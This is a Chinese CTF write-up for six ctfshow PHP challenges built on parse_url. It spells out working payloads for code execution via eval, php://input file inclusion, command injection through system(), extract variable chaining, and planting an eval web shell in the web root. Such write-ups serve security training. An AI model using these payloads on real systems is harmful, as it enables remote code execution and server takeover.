您现在的位置是:首页 >技术交流 >ctfshow周末大挑战2023/5/12网站首页技术交流

ctfshow周末大挑战2023/5/12

T1ngSh0w 2024-06-17 10:19:28
简介ctfshow周末大挑战2023/5/12

本周周末大挑战用到的函数讲解

parse_url()

作用:解析URL,返回其组成部分

语法:
parse_url ( string $url [, int $component = -1 ] )
参数:
url:要解析的 URL。无效字符将使用 _ 来替换。

component:
指定 PHP_URL_SCHEME、 PHP_URL_HOST、 PHP_URL_PORT、 PHP_URL_USER、 PHP_URL_PASS、 PHP_URL_PATH、PHP_URL_QUERY 或 PHP_URL_FRAGMENT 的其中一个来获取 URL 中指定的部分的 string。 (除了指定为PHP_URL_PORT 后,将返回一个 integer 的值)。

例如:

<?php
$url = 'http://user:pass@host/path?args=value#anch';
print_r(parse_url($url));
echo parse_url($url, PHP_URL_PATH);
?>
结果--------------------------------------------------------------------
Array
(
    [scheme] => http
    [host] => host
    [user] => user
    [pass] => pass
    [path] => /path
    [query] => args=value
    [fragment] => anch
)
	/path

extract()

extract() 函数从数组中将变量导入到当前的符号表。

该函数使用数组键名作为变量名,使用数组键值作为变量值。针对数组中的每个元素,将在当前符号表中创建对应的一个变量。

该函数返回成功设置的变量数目。

语法:extract(array,extract_rules,prefix)

例如:

<?php
$a = "Original";
$my_array = array("a" => "Cat","b" => "Dog", "c" => "Horse");
extract($my_array);
echo "$a = $a; $b = $b; $c = $c";
?>
结果-------------------------------------------------------------------
$a = Cat; $b = Dog; $c = Horse

file_put_contents()

file_put_contents() 函数把一个字符串写入文件中。与依次调用 fopen(),fwrite() 以及 fclose() 功能一样。

语法:file_put_contents(file,data,mode,context)
参数:
file:必需。规定要写入数据的文件。如果文件不存在,则创建一个新文件。

data:可选。规定要写入文件的数据。可以是字符串、数组或数据流。

mode:可选。规定如何打开/写入文件。可能的值:
FILE_USE_INCLUDE_PATH
FILE_APPEND
LOCK_EX

context:可选。规定文件句柄的环境。context是一套可以修改流的行为的选项。若使用null,则忽略。

题目讲解及write up

第一关

题目源代码:

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2023-05-10 09:52:06
# @Last Modified by:   h1xa
# @Last Modified time: 2023-05-10 10:58:34
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

$data = parse_url($_GET['u']);

eval($data['host']);

首先,我们分许源代码:GET传参u为url格式的字符串,该url的组成部分被赋给了data数组,然后将data数组中的host的值将他转化为php代码(eval()的作用,可以将字符串转换为php代码)。

OK我们的思路就是在url中host部分写成我们可以进行代码执行的恶意代码。
我们先写一个phpinfo();测试一下。

?u=http://phpinfo();

在这里插入图片描述
成功输出phpinfo。

接下来我们就开始进行代码执行。
我们会发现,我们直接使用system(‘ls /’);来查看根目录是不可行的,因为url中包含的有“/”这个斜杠符号,我们前面已经写过host内容,我们在写出“/”,那么斜杠后的“');”这些东西就会被认为是url 中 path 里的东西了,所以我们得换种思路。

新思路是:我们在源代码的基础上,再使用一次eval()函数进行代码执行,只不过这次我们将传参方式改为POST传参,因为parse_url函数只对GET传参起作用。

GET传参
?u=http://eval($_POST[w]);

POST传参
w=system('ls /');

在这里插入图片描述
找到flag直接cat读取。

GET传参
?u=http://eval($_POST[w]);

POST传参
w=system('cat /flag_is_here.txt');

在这里插入图片描述
成功拿到flag。

第二关

题目源代码:

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2023-05-10 09:52:06
# @Last Modified by:   h1xa
# @Last Modified time: 2023-05-12 13:25:53
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

$data = parse_url($_GET['u']);

include $data['host'].$data['path'];

首先还是分析源代码:GET传参u为url格式的字符串,该url的组成部分被赋给了data数组,使用include函数将data数组中host的值与path的值拼接的结果进行文件包含。

首先我们要明白一点,文件包含,我们就得使用伪协议进行命令执行或者代码执行来找到flag文件在哪,然后才能读取。但是如果我们按照正常的url格式进行传参的话,就比如u=http://host/flag,那么我们的path是一定会带有“/”这个符号的。所以我们就得使用非正常方法。

这里有一个小tips:就是当我们输入?u=http:php://这个字符串的时候,
我们的path是“php://”这个字符串的,而且host是为空的。

所以我们就可以使用php://伪协议中的php://input来实现代码执行,进而执行命令。(由于我的hackbar的问题,我是在bp上进行的)

GET传参
?u=http:php://input

POST传参
<?php phpinfo();?>

在这里插入图片描述
可以看到成功的输出了phpinfo的内容。

接下来就是看在根目录中找到flag文件进行读取。

GET传参
?u=http:php://input

POST传参
<?php system('cat /_f1ag_1s_h3re.txt');?>

在这里插入图片描述
成功拿到flag。

第三关

题目源代码:

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2023-05-10 09:52:06
# @Last Modified by:   h1xa
# @Last Modified time: 2023-05-12 13:29:18
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

$data = parse_url($_GET['u']);

include $data['scheme'].$data['path'];

首先还是分析源代码:GET传参u为url格式的字符串,该url的组成部分被赋给了data数组,使用include函数将data数组中scheme(协议名称)的值与path的值拼接的结果进行文件包含

本道题目跟上道题目的思路是一样的,还是利用php://伪协议进行文件包含,只不过host变成了scheme(协议名称)。

这里还是一个小tips:就是当我们输入?u=http:://123这个字符串的时候,
我们的path是“://123”这个字符串的,scheme是“http”,
他们俩拼接在一起就是“http://123”。
我们要使用php://input伪协议,只需将http改为php,将://123改为://input即可。
GET传参
?u==php:://input

POST传参
<?php phpinfo();?>

在这里插入图片描述
也是成功的输出了phpinfo的信息。

接下来就是在根目录找到flag进行读取了。

GET传参
?u==php:://input

POST传参
<?php system('cat /_f1a_g_1s_h3re');?>

在这里插入图片描述
成功拿到flag。

第四关

题目源代码:

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2023-05-10 09:52:06
# @Last Modified by:   h1xa
# @Last Modified time: 2023-05-12 13:29:35
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/

$data = parse_url($_GET['u']);

system($data['host']);

首先我们还是先来分析一波代码,GET传参u为url格式的字符串,该url的组成部分被赋给了data数组,然后使用system()函数将data数组中host的值作为命令进行命令执行。

这里需要注意的是,我们不能直接使用“u=http://ls /”来作为payload,因为ls / 中的斜杠,会被parse_url函数当作path中的内容,这样我们还是在原来的目录中进行ls。

这时我们应该怎么办呢?
我们可以尝试先执行一个pwd,然后再重新执行cd …;pwd 试一下。

?u=http://pwd;cd ..;pwd

在这里插入图片描述
我们可以看到,我们使用cd切换目录之后,两次的pwd执行结果不同,代表我们切换目录成功,那么我们就可以使用cd …;cd …;cd …;一直切换到根目录,然后进行找寻flag进行读取了。

?u=http://cd ..;cd ..;cd ..;cat 1_f1ag_1s_h3re

在这里插入图片描述
成功拿到flag。

第五关

题目源代码:

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2023-05-10 09:52:06
# @Last Modified by:   h1xa
# @Last Modified time: 2023-05-12 13:29:38
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/

extract(parse_url($_GET['u']));
include $$$$$$host;

本题目是个套娃问题,就是使用extract函数将GET传参url中的组成,host变为$host,其值为url中host的值,path、scheme、query等部分也是一样。

这时我们就可以通过参数指向(比如,再将host的值写为scheme,那么$host=scheme,$$host=$scheme=scheme的值),来最终包含我们的php://input伪协议进行文件包含。

payload:

GET传参
?u=user://pass:fragment@scheme/?php://input%23query
注:%23#的url编码,如果不写%23直接写#,#后的内容会被浏览器直接过滤掉。

POST传参
<?php phpinfo();?>

这样的话:
$host=scheme
$$host=$scheme=user
$$$host=$user=pass
$$$$host=$pass=fragment
$$$$$host=$fragment=query
$$$$$$host=$query=php://input

这样我们在进行post传参执行php代码,就可以使用php://input进行文件包含执行php代码了。

在这里插入图片描述
成功输出了phpinfo的信息,接下来就是在根目录中找flag文件进行读取。

payload:

GET传参
?u=user://pass:fragment@scheme/?php://input%23query
注:%23#的url编码,如果不写%23直接写#,#后的内容会被浏览器直接过滤掉。

POST传参
<?php system('cat /_f1ag_1s_h3ree');?>

在这里插入图片描述
成功拿到flag。

第六关

题目源代码:

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2023-05-10 09:52:06
# @Last Modified by:   h1xa
# @Last Modified time: 2023-05-12 13:29:18
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/

$data = parse_url($_GET['u']);

file_put_contents($data['path'], $data['host']);

首先还是分析源代码,GET传参u为url格式的字符串,该url的组成部分被赋给了data数组,然后使用file_put_contents()函数来将data数组中host的值作为内容写进data数组中path的值为文件名的文件中。

这里经过测试发现,host中?与php不能和<>紧挨着出现,那么传统的php文件内容形式是采取不了了。

我们就是用html文件中的< script language=‘php’>标签来实现php的代码。这里记住,只需写一个< script>,不需要写< /scirpt>,因为/还会被parse_url函数当作path中的内容。
由于正常的url中,path自带 / ,我们将path写成/var/www/html/a.php,这样我们的host中的内容就会被写到网站根目录中a.php中。

payload:

?u=http://<script language='php'>phpinfo();/var/www/html/a.php

$data['host']=<script language='php'>phpinfo();
$data['path']=/var/www/html/a.php

我们去访问a.php。
在这里插入图片描述
a.php显示出来phpinfo的信息,接下来我们将内容改为能够代码执行的php代码即可。

?u=http://<script language='php'>eval($_GET[w]);/var/www/html/a.php

然后去访问a.php。并且传参w=system(‘ls /’);即可列出根目录的内容。

a.php?w=system('ls /');

在这里插入图片描述
读取flag。

a.php?w=system('cat /_f1a_g_1s_h3re');

在这里插入图片描述
成功拿到flag。

风语者!平时喜欢研究各种技术,目前在从事后端开发工作,热爱生活、热爱工作。